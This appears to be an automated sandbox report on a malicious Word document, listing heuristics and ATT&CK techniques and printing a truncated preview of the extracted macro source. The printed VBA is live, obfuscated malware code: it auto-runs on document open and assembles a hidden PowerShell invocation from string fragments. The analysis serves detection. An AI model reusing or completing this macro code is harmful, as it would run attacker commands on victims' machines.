Risk Score: 162 (MALICIOUS)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The critical heuristic firing for the Shell() call in VBA, together with the Document_Open macro, indicates that the macro is designed to execute arbitrary commands as soon as the document is opened. The script assembles a command string from fragments and runs it, likely to download and execute a second-stage payload.
Heuristics (5)
- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA
- Document_Open macro (high) [OLE_VBA_DOCOPEN]: Document_Open macro
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 1028d0fc6ec1eaff3cdf8535caf929db5bb1c37517a84eb1bba95b9fb74feae6) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 37165 bytes |

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "khWRjAEBKLN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
qwPwRD = 98352 - TCFClJ * 84547 + wwboFA + (KFuKl + OdQbwG - owQIc / sViXq) * (75259 + zXtAHW + 80071 * ErXsN)
qaKQD = 83748 - EJPzY * 44697 + XsjhmG + (UfJAKI + RHWsL - KKJdo / fIJMJw) * (78242 + kHALN + 38617 * WuBQs)
mCsFM = 40991 - MjDsJ * 52705 + KSzDVw + (KGLirf + QHNwui - HTEjT / XYzTDs) * (66567 + bBMXj + 49615 * whaVqc)
UaRzj = 9739 - QPonwp * 93676 + kUMUN + (vWhUYJ + VRoOp - GOlVD / mDwLUG) * (83194 + DmbSWV + 65988 * DjfLv)
wAYHQq = 73172 - wIXaiw * 22289 + NjYQi + (VsTqiL + qsBNH - KwzauR / cJwuDZ) * (84982 + RiXIM + 16149 * jnZIbw)
qfHGDcijYSw = Application.Run("qnAMCuQr", "" + oapCVnCfTM + DjhDXwir + RJOQNhaiW + rqjnRvAAHz + obmHtkTiu + adjBIiOHlj + QtrzwJ + qnlhNqV + oEunnOqdoC + BzOIaRrBu + TNTcSNZXj + MhskklqA + vmRui + NWAAQNFdzv + uYmISiYO)
vqjPL = 2636 - qoTubh * 63949 + rGEYt + (RuSmP + zITjAs - bJTBB / qJGtR) * (34769 + FibYUq + 69859 * dvOdwO)
VktjZF = 30168 - FCTDz * 21166 + AUYhR + (vPKHLz + FYFpD - lJYiQz / DTRWj) * (95247 + tOIXh + 41615 * ZUicO)
End Sub
Attribute VB_Name = "SjzdzXZ"
Function RJOQNhaiW()
On Error Resume Next
kpFAX = (HuczW + lOHhEZ / 80921 - HffIn - (mkvcLY + lPXzt * mcoUQQ / CkwZi + zutEKz * sRXwA - wOzwkk - jDwTK))
woHUk = "" + cClWzlacs + zhAUFpUf + "pOwe" + DlNoTttz + wFvQPlbDAXmHoY + "rsH" + jiriqjZIZQY + rjiSQQumjFT + "eLL" + iuWwzpDpN + vDMfmrw + " " + Chr(34) + ZIqHoXHqrwdXQ + fmdSifn + " . " + YWMDPzsGGU + DOHahMwQhi + "( $s" + HAAOfiNliVj + EbsEWQwj + "He" + XVsBTpNnprh + zibcHGrii + "Llid" + dlGMLRiwZ + smduwRhuadI + "[1]" + avopartshdXhj + YIjWqWmowMK + Chr(43) + "$S"
kOlUY = (24957 + QdtXhi + 68830 - IFMMR * 10798 * RtlWW) - 76934 / pcQSt * 16083 + sDJWO
hVzVNjTivc = "" + LpLmbftAz + OwriCqwJnQHOlb + "heL" + CDqDtbCiw + MbwcTKwtWAUH + "li" + CHwEaZLiP + GEBnuJmrGliqon + "D[1" + hVPhvKnrTDdWl + MFfMFzGcriQ + "3]" + Chr(43) + URJQWldNzJB + JTqfQFjHV + "'x"
suXCW = iDTQV / 62489 - jFijW + NMiiYM / (14597 * HkanvN + 6349 / lSoAW + 67600 / 77525 / 90530 - sukmSj)
piLJD = GNiUql / 46354 - sXbEs + lnIDfz / (40363 * sBEHjp + 81661 / iOrON + 26376 / 52078 / 1683 - XPuDw)
bwqat = zfkIW / 4504 - MzzvQM + iQonmm / (21840 * KtXwf + 2064 / YvCUaJ + 41948 / 23827 / 17615 - RwTQFl)
KvuwzEQD = "" + aoOLwpO + StdZTMUTQr + "')" + iYjlfRWvoE + smOAaTw + " ( \" + LVBTTbXSzQWKhw + aTYrdjOhWjh + Chr(34) + "$("
Vrzztv = qEqwN / 41326 - waiiT + VBMkY / (84817 * rCUifb + 41640 / CZBNY + 19010 / 69208 / 9641 - RkmilS)
twtkY = ChSMq / 98802 - onovKp + VAAZuU / (54490 * UwntZ + 98035 / UdaJd + 25776 / 95177 / 15229 - isAub)
URzDDkz = "" + hFTiPZAC + kIQmzHtAdVvBl + "Set" + ToFLFjwWYt + XKcMVivUiBzmas + " 'O" + qMjTXFvlvrWEl + sjKWqAIZTpbvS + "FS" + kNSGjMMza + rRiLrjsJE + "' " + VarhmMdvJ + cGIlfFffmjDbJr + " ''" + wsDJlPTr + wZATfJlwo + ") \" + GDmdYRj + ipqFfCFTJMnQtQ + Chr(34) + " " + fSEupND + rpRfMwm + Chr(43) + "[s" + jIjuocDRnckmM + XswcYJVmSBn + "tRI"
RJOQNhaiW = "" + owNArAkwWldcq + aoRfClITAK + woHUk + LWQtBPOdqOju + hAHVAhl + hVzVNjTivc + djILCjcN + RYbFrcNbuiLEX + KvuwzEQD + EHLfKTz + nKtDLzOB + URzDDkz
udFuQ = nFrMAZ / 23060 - KwYQif + TIRSj / (67735 * PwUKK + 37261 / WzMvm + 44825 / 25610 / 12092 - JOwDt)
End Function
Function rqjnRvAAHz()
On Error Resume Next
iATSZ = TDsiLU / 85404 - YlCzM + cjokzI / (30279 * UjDOFQ + 51930 / ZsOaaS + 89349 / 65422 / 44469 - nunMc)
NMcWH = OPfXA / 57951 - nXVzU + TmocI / (37094 * nCunF + 55079 / LoKuVn + 32709 / 67400 / 75020 - MLwfjn)
SPjbUn = jJdqvs / 80065 - sQozM + wHKNF / (14974 * ifQCX + 43559 / unzCLk + 23736 / 55610 / 87144 - LKUwF)
YltMV = "" + uzLiTRUWi + zObrvMKkmBJ + "ng](" + NjVVJHGT + WdQqYzFDjkCZD + "'36" + rASzoLk + UnvzNbD + "z11" + WFNfVlmj + BDncKSSHoT + "5h89" + lSLWlCGqIhqQ + pMijMHM + "M11" + BjKljuUP + oTvUzzka + "6{"
... (truncated)